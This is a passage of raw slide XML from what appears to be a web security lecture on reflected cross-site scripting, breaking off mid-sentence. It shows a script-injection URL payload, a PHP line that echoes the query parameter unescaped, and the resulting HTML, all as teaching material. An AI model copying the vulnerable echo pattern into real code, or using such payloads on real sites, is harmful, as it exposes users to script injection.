        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>safebank.com/search.php?query=chocolate</a:t>
            </a:r>
            <a:endParaRPr sz="667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>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9395" y="450262"/>
            <a:ext cx="6452447" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-73" dirty="0"/>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t> Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-53" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1940559" y="3811015"/>
            <a:ext cx="9936479" cy="307339"/>
            <a:chOff x="1455419" y="2858261"/>
            <a:chExt cx="7452359" cy="230504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1455419" y="2858261"/>
              <a:ext cx="243840" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="243839" h="230505">
                  <a:moveTo>
                    <a:pt x="243839" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243839" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243839" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FDF8E3"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1699260" y="2858261"/>
              <a:ext cx="6964680" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6964680" h="230505">
                  <a:moveTo>
                    <a:pt x="5622023" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5622023" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5622023" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5622023" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="6964680" h="230505">
                  <a:moveTo>
                    <a:pt x="6964680" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6842760" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5745480" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5622036" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5622036" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5745480" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6842760" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6964680" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6964680" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FEFCF5"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8663939" y="2858261"/>
              <a:ext cx="243840" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="243840" h="230505">
                  <a:moveTo>
                    <a:pt x="243840" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243840" y="230124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243840" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FDF8E3"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1617812"/>
            <a:ext cx="11179387" cy="2477837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="24553" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="1026134">
              <a:lnSpc>
                <a:spcPct val="98300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="193"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>“search.php?query=&lt;script&gt;doEvil()&lt;/script&gt;” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>causes script injection. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Note that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the query is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>never </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stored </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-707" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>server,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>hence </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>term</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>'reflected'</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933"/>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Code:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>“Your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$_GET['query']</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>returned</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$num</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="818181"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>results."</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="4261347"/>
            <a:ext cx="1376680" cy="344475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16087" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="127"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-93" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Code:</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2137663" y="4322978"/>
            <a:ext cx="8961120" cy="293607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDF8E3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="87" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>returned</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>results</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="5275413"/>
            <a:ext cx="11069320" cy="995999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="46567" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:lnSpc>
                <a:spcPts val="3707"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="367"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>But </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>this </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>only </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>injects </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attacker’s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>page. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>needs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-707" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>make</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>click</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
